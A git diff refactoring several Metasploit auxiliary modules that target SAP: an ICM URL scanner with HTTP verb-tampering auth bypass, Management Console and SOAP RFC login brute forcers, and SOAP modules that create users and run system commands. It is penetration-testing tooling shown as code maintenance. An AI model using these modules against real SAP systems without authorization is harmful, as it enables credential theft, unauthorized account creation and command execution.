         OptString.new('VERB',    [true, "Verb for auth bypass testing", "HEAD"]),
-        OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
+        OptPath.new('URLFILE', [true, "SAP ICM Paths File",
+          File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')])
       ], self.class)
   end
 
   # Base Structure of module borrowed from jboss_vulnscan
   def run_host(ip)
-    # If URLFILE is set empty, obviously the user made a silly mistake
-    if datastore['URLFILE'].empty?
-      print_error("Please specify a URLFILE")
-      return
-    end
-
-    # Initialize the actual URLFILE path
-    if datastore['URLFILE'] == "sap_icm_paths.txt"
-      url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
-    else
-      # Not the default sap_icm_paths file
-      url_file = datastore['URLFILE']
-    end
-
-    # If URLFILE path doesn't exist, no point to continue the rest of the script
-    if not File.exists?(url_file)
-      print_error("Required URL list #{url_file} was not found")
-      return
-    end
-
-    res = send_request_cgi(
+     res = send_request_cgi(
       {
         'uri'       => "/" + Rex::Text.rand_text_alpha(12),
         'method'    => 'GET',
-        'ctype'     => 'text/plain',
-      }, 20)
+      })
 
     if res
       print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
       @info = []
-      if not res.headers['Server'].nil?
+      if res.headers['Server']
         @info << res.headers['Server']
         print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
       else
         print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
       end
 
-      if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
+      if (res.body && /class="note">(.*)code:(.*)</i.match(res.body) )
         print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
       end
 
       # Load URLs
-      urls_to_check = []
-      File.open(url_file) do |f|
+      urls_to_check = check_urlprefixes
+      File.open(datastore['URLFILE']) do |f|
         f.each_line do |line|
           urls_to_check.push line
         end
       end
 
       print_status("#{rhost}:#{rport} Beginning URL check")
+      @valid_urls = ''
       urls_to_check.each do |url|
         check_url(url.strip)
       end
@@ -93,59 +73,116 @@ class Metasploit3 < Msf::Auxiliary
       print_error("#{rhost}:#{rport} No response received")
     end
 
+    if @valid_urls.length > 0
+      l = store_loot(
+        'sap.icm.urls',
+        "text/plain",
+        datastore['RHOST'],
+        @valid_urls,
+        "icm_urls.txt", "SAP ICM Urls"
+      )
+      print_line
+      print_good("Stored urls as loot: #{l}") if l
+    end
   end
 
   def check_url(url)
+    full_url = write_url(url)
     res = send_request_cgi({
-      'uri'       => url,
+      'uri'       => normalize_uri(url),
       'method'    => 'GET',
-      'ctype'     => 'text/plain',
-    }, 20)
+    })
 
     if (res)
-      if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
-        print_good("New server header seen [#{res.headers['Server']}]")
-        @info << res.headers['Server'] #Add To seen server headers
+      if res.headers['Server']
+        unless @info.include?(res.headers['Server'])
+          print_good("New server header seen [#{res.headers['Server']}]")
+          @info << res.headers['Server'] #Add To seen server headers
+        end
       end
 
-      case
-      when res.code == 200
-        print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)")
-      when res.code == 403
-        print_good("#{rhost}:#{rport} #{url} - restricted (403)")
-      when res.code == 401
-        print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
+      case res.code
+      when 200
+        print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})")
+        @valid_urls << full_url << "\n"
+      when 403
+        print_status("#{full_url} - restricted (#{res.code})")
+      when 401
+        print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}")
+        @valid_urls << full_url << "\n"
         # Attempt verb tampering bypass
         bypass_auth(url)
-      when res.code == 404
+      when 404
         # Do not return by default, only display in verbose mode
-        vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
-      when res.code == 500
-        print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
-      when res.code == 301, res.code == 302
-        print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
+        vprint_status("#{full_url} - not found (#{res.code})")
+      when 400, 500
+        print_status("#{full_url} - produced a server error (#{res.code})")
+      when 301, 302
+        print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
+        @valid_urls << full_url << "\n"
+      when 307
+        print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
       else
-        vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
+        print_error("#{full_url} - unhandled response code #{res.code}")
+        @valid_urls << full_url << "\n"
       end
 
     else
-      print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)")
+      vprint_status("#{full_url} - not found (No Repsonse code Received)")
     end
   end
 
+  def write_url(path)
+    if datastore['SSL']
+      protocol = 'https://'
+    else
+      protocol = 'http://'
+    end
+
+    "#{protocol}#{rhost}:#{rport}#{path}"
+  end
+
   def bypass_auth(url)
-    print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
+    full_url = write_url(url)
+    vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})")
 
     res = send_request_raw({
-      'uri'       => url,
+      'uri'       => normalize_uri(url),
       'method'    => datastore['VERB'],
       'version'   => '1.0' # 1.1 makes the head request wait on timeout for some reason
-    }, 20)
+    })
 
-    if (res and res.code == 200)
-      print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering")
+    if (res && res.code == 200)
+      print_good("#{full_url} Got authentication bypass via HTTP verb tampering")
     else
-      print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
+      vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
     end
   end
+
+  # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS.
+  # This is how the message server finds out which URLs must be forwarded where.
+  #  (SAP help) -> this disclose custom URLs that are also checked for authentication
+  def check_urlprefixes
+    urls = []
+    res = send_request_cgi({
+      'uri'       => "/sap/public/icf_info/urlprefix",
+      'method'    => 'GET',
+    })
+
+    if (res && res.code == 200)
+      res.body.each_line do |line|
+        if line =~ /PREFIX=/
+          url_enc = line.sub(/^PREFIX=/, '')
+          # Remove CASE and VHOST
+          url_enc = url_enc.sub(/&CASE=.*/, '')
+          url_dec = URI.unescape(url_enc).sub(/;/, '')
+          urls << url_dec.strip
+        end
+      end
+    else
+      print_error("#{rhost}:#{rport} Could not retrieve urlprefixes")
+    end
+
+    urls
+  end
 end
diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
index aa0ad16ba7..b71eaaa5cf 100644
--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
@@ -16,13 +16,10 @@ class Metasploit4 < Msf::Auxiliary
     super(
       'Name'           => 'SAP Management Console Brute Force',
       'Description'    => %q{
-        This module simply attempts to brute force the username |
-        password for the SAP Management Console SOAP Interface. By
-        setting the SAP SID value, a list of default SAP users can be
-        tested without needing to set a USERNAME or USER_FILE value.
-        The default usernames are stored in
-        ./data/wordlists/sap_common.txt (the value of SAP SID is
-        automatically inserted into the username to replce <SAPSID>).
+        This module simply attempts to brute force the username and
+        password for the SAP Management Console SOAP Interface. If
+        the SAP_SID value is set it will replace instances of <SAPSID>
+        in any user/pass from any wordlist.
         },
       'References'     =>
         [
@@ -36,49 +33,43 @@ class Metasploit4 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(50013),
-        OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', '']),
-        OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
+        OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]),
+        OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']),
+        OptPath.new('USER_FILE', [ false, "File containing users, one per line",
+                                   File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ])
       ], self.class)
     register_autofilter_ports([ 50013 ])
   end
 
-  def run_host(ip)
+  def run_host(rhost)
+    uri = normalize_uri(target_uri.path)
     res = send_request_cgi({
-      'uri'     => normalize_uri(datastore['URI']),
+      'uri'     => uri,
       'method'  => 'GET'
-    }, 25)
+    })
 
     if not res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{peer} [SAP] Unable to connect")
       return
     end
 
-    if datastore['SAP_SID'] != ''
-      if !datastore['USER_FILE'].nil?
-        print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
-      elsif !datastore['USERPASS_FILE'].nil?
-        print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
-      else
-        print_status("SAPSID set to '#{datastore['SAP_SID']}' - Setting default SAP wordlist")
-        datastore['USER_FILE'] = Msf::Config.data_directory + '/wordlists/sap_common.txt'
-      end
-    end
+    print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID']
 
     each_user_pass do |user, pass|
-      enum_user(user,pass)
+      enum_user(user,pass,uri)
     end
 
   end
 
-  def enum_user(user, pass)
+  def enum_user(user, pass, uri)
 
     # Replace placeholder with SAP SID, if present
-    if datastore['SAP_SID'] != ''
+    if datastore['SAP_SID']
       user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase)
       pass = pass.gsub("<SAPSID>", datastore["SAP_SID"])
     end
 
-    print_status("#{rhost}:#{rport} - Trying username:'#{user}' password:'#{pass}'")
+    print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'")
     success = false
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@@ -103,7 +94,7 @@ class Metasploit4 < Msf::Auxiliary
 
     begin
       res = send_request_raw({
-        'uri'      => normalize_uri(datastore['URI']),
+        'uri'      => uri,
         'method'   => 'POST',
         'data'     => data,
         'headers'  =>
@@ -113,9 +104,9 @@ class Metasploit4 < Msf::Auxiliary
             'Content-Type'   => 'text/xml; charset=UTF-8',
             'Authorization'  => 'Basic ' + user_pass
           }
-      }, 45)
+      })
 
-      return if not res
+      return unless res
 
       if (res.code != 500 and res.code != 200)
         return
@@ -136,17 +127,17 @@ class Metasploit4 < Msf::Auxiliary
       end
 
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP #{rhost}] Unable to connect")
+      print_error("#{peer} [SAP] Unable to connect")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] Successful login '#{user}' password: '#{pass}'")
+      print_good("#{peer} [SAP] Successful login '#{user}' password: '#{pass}'")
 
       if permission
-        vprint_good("#{rhost}:#{rport} [SAP] Login '#{user}' authorized to perform OSExecute calls")
+        vprint_good("#{peer} [SAP] Login '#{user}' authorized to perform OSExecute calls")
       else
-        vprint_error("#{rhost}:#{rport} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
+        vprint_error("#{peer} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
       end
 
       report_auth_info(
@@ -160,10 +151,9 @@ class Metasploit4 < Msf::Auxiliary
         :target_host => rhost,
         :target_port => rport
       )
-      return
     else
-      vprint_error("#{rhost}:#{rport} [SAP] failed to login as '#{user}':'#{pass}'")
-      return
+      vprint_error("#{peer} [SAP] failed to login as '#{user}':'#{pass}'")
     end
   end
 end
+
diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb
index 8fbb4cc489..201e252d19 100644
--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb
@@ -30,7 +30,7 @@ class Metasploit4 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(50013),
-        OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
+        OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']),
         OptString.new('MATCH', [false, 'Display matches e.g login/', '']),
       ], self.class)
     register_autofilter_ports([ 50013 ])
@@ -38,16 +38,6 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    res = send_request_cgi({
-      'uri'      => normalize_uri(datastore['URI']),
-      'method'   => 'GET'
-    }, 25)
-
-    if not res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
-      return
-    end
-
     getprocparam(ip)
   end
 
@@ -75,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary
 
     begin
       res = send_request_raw({
-        'uri'      => normalize_uri(datastore['URI']),
+        'uri'      => normalize_uri(target_uri.path),
         'method'   => 'POST',
         'data'     => data,
         'headers'  =>
@@ -84,9 +74,9 @@ class Metasploit4 < Msf::Auxiliary
             'SOAPAction'     => '""',
             'Content-Type'   => 'text/xml; charset=UTF-8',
           }
-      }, 30)
+      })
 
-      if not res
+      unless res
         print_error("#{rhost}:#{rport} [SAP] Unable to connect")
         return
       end
@@ -100,7 +90,7 @@ class Metasploit4 < Msf::Auxiliary
           body = res.body
           success = true
         end
-      elsif res.code == 500
+      elsif res
         case res.body
         when /<faultstring>(.*)<\/faultstring>/i
           faultcode = $1.strip
@@ -116,16 +106,16 @@ class Metasploit4 < Msf::Auxiliary
     end
 
     if success
-      #Only stoor loot if MATCH is not selected
-      if datastore['MATCH'].empty?
-        print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot")
-        store_loot(
+      # Only store loot if MATCH is not selected
+      if datastore['MATCH'].blank?
+        loot = store_loot(
           "sap.getprocessparameters",
           "text/xml",
           rhost,
           res.body,
           ".xml"
         )
+        print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to #{loot}")
       else
         name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n'])
         print_status("[SAP] Regex match selected, skipping loot storage")
diff --git a/modules/auxiliary/scanner/sap/sap_smb_relay.rb b/modules/auxiliary/scanner/sap/sap_smb_relay.rb
index f8e69a04d5..625e0cb630 100644
--- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb
+++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb
@@ -252,4 +252,4 @@ class Metasploit4 < Msf::Auxiliary
     end
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
index 7a9535e6a9..ca96bb83eb 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
@@ -70,17 +70,21 @@ class Metasploit4 < Msf::Auxiliary
     data << '</env:Envelope>'
     begin
       print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
+
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
         'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'ctype' => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>
-          {
-            'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-          }
+        'headers' => {
+          'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get' => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
+        }
       })
       if res and res.code == 200
         if res.body =~ /<h1>Logon failed<\/h1>/
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
index d19a43b7c7..393076fc68 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
@@ -25,13 +25,10 @@ class Metasploit4 < Msf::Auxiliary
 
   def initialize
     super(
-      'Name' => 'SAP /sap/bc/soap/rfc SOAP Service RFC_PING Login Brute Forcer',
+      'Name' => 'SAP SOAP Service RFC_PING Login Brute Forcer',
       'Description' => %q{
         This module attempts to brute force SAP username and passwords through the
-        /sap/bc/soap/rfc SOAP service, using RFC_PING function. Default clients can be
-        tested without needing to set a CLIENT. Common/Default user and password
-        combinations can be tested just setting DEFAULT_CRED variable to true. These
-        default combinations are stored in MSF_DATA_DIRECTORY/wordlists/sap_default.txt.
+        /sap/bc/soap/rfc SOAP service, using RFC_PING function.
       },
       'References' =>
         [
@@ -47,34 +44,32 @@ class Metasploit4 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(8000),
-        OptString.new('CLIENT', [false, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']),
-        OptBool.new('DEFAULT_CRED',[false, 'Check using the defult password and username',true])
+        OptString.new('CLIENT', [true, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']),
+        OptString.new('TARGETURI', [true, 'The base path to the SOAP RFC Service', '/sap/bc/soap/rfc']),
+        OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",
+          File.join(Msf::Config.data_directory, "wordlists", "sap_default.txt") ])
       ], self.class)
   end
 
-  def run_host(ip)
-    if datastore['CLIENT'].nil?
-      print_status("Using default SAP client list")
-      client = ['000', '001', '066']
+  def run_host(rhost)
+    client_list = []
+    if datastore['CLIENT'] =~ /^\d{3},/
+      client_list = datastore['CLIENT'].split(/,/)
+      print_status("Brute forcing clients #{datastore['CLIENT']}")
+    elsif datastore['CLIENT'] =~ /^\d{3}-\d{3}\z/
+      array = datastore['CLIENT'].split(/-/)
+      client_list = (array.at(0)..array.at(1)).to_a
+      print_status("Brute forcing clients #{datastore['CLIENT']}")
+    elsif datastore['CLIENT'] =~ /^\d{3}\z/
+      client_list.push(datastore['CLIENT'])
+      print_status("Brute forcing client #{datastore['CLIENT']}")
     else
-      client = []
-      if datastore['CLIENT'] =~ /^\d{3},/
-        client = datastore['CLIENT'].split(/,/)
-        print_status("Brute forcing clients #{datastore['CLIENT']}")
-      elsif datastore['CLIENT'] =~ /^\d{3}-\d{3}\z/
-        array = datastore['CLIENT'].split(/-/)
-        client = (array.at(0)..array.at(1)).to_a
-        print_status("Brute forcing clients #{datastore['CLIENT']}")
-      elsif datastore['CLIENT'] =~ /^\d{3}\z/
-        client.push(datastore['CLIENT'])
-        print_status("Brute forcing client #{datastore['CLIENT']}")
-      else
-        print_status("Invalid CLIENT - using default SAP client list instead")
-        client = ['000', '001', '066']
-      end
+      fail_with(Failure::BadConfig, "Invalid CLIENT")
     end
-    saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default,
-      'Header' => "[SAP] Credentials",
+
+    saptbl = Msf::Ui::Console::Table.new(
+      Msf::Ui::Console::Table::Style::Default,
+      'Header' => "[SAP] #{peer} Credentials",
       'Prefix' => "\n",
       'Postfix' => "\n",
       'Indent'  => 1,
@@ -86,29 +81,29 @@ class Metasploit4 < Msf::Auxiliary
           "user",
           "pass"
         ])
-    if datastore['DEFAULT_CRED']
-      credentials = extract_word_pair(Msf::Config.data_directory + '/wordlists/sap_default.txt')
-      credentials.each do |u, p|
-        client.each do |cli|
-          success = bruteforce(u, p, cli)
-          if success
-            saptbl << [ rhost, rport, cli, u, p]
-          end
+
+    client_list.each do |c|
+      print_status("#{peer} [SAP] Trying client: #{c}")
+      each_user_pass do |u, p|
+        vprint_status("#{peer} [SAP] Trying #{c}:#{u}:#{p}")
+        begin
+          success = bruteforce(u, p, c)
+          saptbl << [ rhost, rport, c, u, p] if success
+        rescue ::Rex::ConnectionError
+          print_error("#{peer} [SAP] Not responding")
+          return
         end
       end
     end
-    each_user_pass do |u, p|
-      client.each do |cli|
-        success = bruteforce(u, p, cli)
-        if success
-          saptbl << [ rhost, rport, cli, u, p]
-        end
-      end
+
+    if saptbl.rows.count > 0
+      print_line saptbl.to_s
     end
-    print(saptbl.to_s)
   end
 
   def bruteforce(username,password,client)
+    uri = normalize_uri(target_uri.path)
+
     data = '<?xml version="1.0" encoding="utf-8" ?>'
     data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
     data << '<env:Body>'
@@ -116,36 +111,40 @@ class Metasploit4 < Msf::Auxiliary
     data << '</n1:RFC_PING>'
     data << '</env:Body>'
     data << '</env:Envelope>'
-    begin
-      res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
-        'ctype' => 'text/xml; charset=UTF-8',
-        'authorization' => basic_auth(username, password),
-        'headers' =>
-          {
-            'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-          }
-      })
-      if res and res.code == 200
-        report_auth_info(
-          :host => rhost,
-          :port => rport,
-          :sname => "sap",
-          :proto => "tcp",
-          :user => "#{username}",
-          :pass => "#{password}",
-          :proof => "SAP Client: #{client}",
-          :active => true
-        )
-        return true
-      end
-    rescue ::Rex::ConnectionError
-      print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
-      return false
+
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'POST',
+      'vars_get' => {
+        'sap-client' => client,
+        'sap-language' => 'EN'
+      },
+      'data' => data,
+      'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}",
+      'ctype' => 'text/xml; charset=UTF-8',
+      'authorization' => basic_auth(username, password),
+      'headers' =>
+        {
+          'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        }
+    })
+
+    if res && res.code == 200 && res.body.include?('RFC_PING')
+      print_good("#{peer} [SAP] Client #{client}, valid credentials #{username}:#{password}")
+      report_auth_info(
+        :host => rhost,
+        :port => rport,
+        :sname => "sap",
+        :proto => "tcp",
+        :user => username,
+        :pass => password,
+        :proof => "SAP Client: #{client}",
+        :active => true
+      )
+      return true
     end
-    return false
+
+    false
   end
 end
+
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
index 72460a04fc..c20283e921 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
@@ -93,14 +93,18 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
         'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'ctype' => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers' => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get' => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code != 500 and res.code != 200
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
index b8ec123d75..fc110dbd7b 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
@@ -94,14 +94,18 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
         'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'ctype' => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers' => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get' => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb
index ec95f65519..be20e21b59 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb
@@ -62,17 +62,20 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}",
         'data' => data,
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'ctype'  => 'text/xml; charset=UTF-8',
-        'headers' =>
-          {
-            'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
-          }
-        })
+        'headers' => {
+          'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
+        },
+        'vars_get' => {
+          'sap-client'    => client,
+          'sap-language'  => 'EN'
+        }
+      })
       if res and res.code != 500 and res.code != 200
         if res and res.body =~ /<h1>Logon failed<\/h1>/
           print_error("[SAP] #{ip}:#{rport} - login failed!")
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb
index d7e7ad065b..3d19045911 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb
@@ -83,19 +83,20 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
         'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'ctype' => 'text/xml; charset=UTF-8',
-        'headers' =>{
+        'headers' => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-          #'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-          #'Authorization' => 'Basic ' + user_pass,
-          #'Content-Type' =>
-          }
-        })
+        },
+        'vars_get' => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
+        }
+      })
       if res and res.code != 500 and res.code != 200
         # to do - implement error handlers for each status code, 404, 301, etc.
         if res.body =~ /<h1>Logon failed<\/h1>/
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
index f60e420352..d8f0f2ba23 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
@@ -70,17 +70,20 @@ class Metasploit4 < Msf::Auxiliary
     begin
       vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
         'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'ctype' => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers'  =>
-          {
-            'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
-          }
-        })
+        'headers'  => {
+          'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
+        },
+        'vars_get' => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
+        }
+      })
       if res and res.code == 200
         if res.body =~ /<h1>Logon failed<\/h1>/
           vprint_error("[SAP] #{ip}:#{rport} - Logon failed")
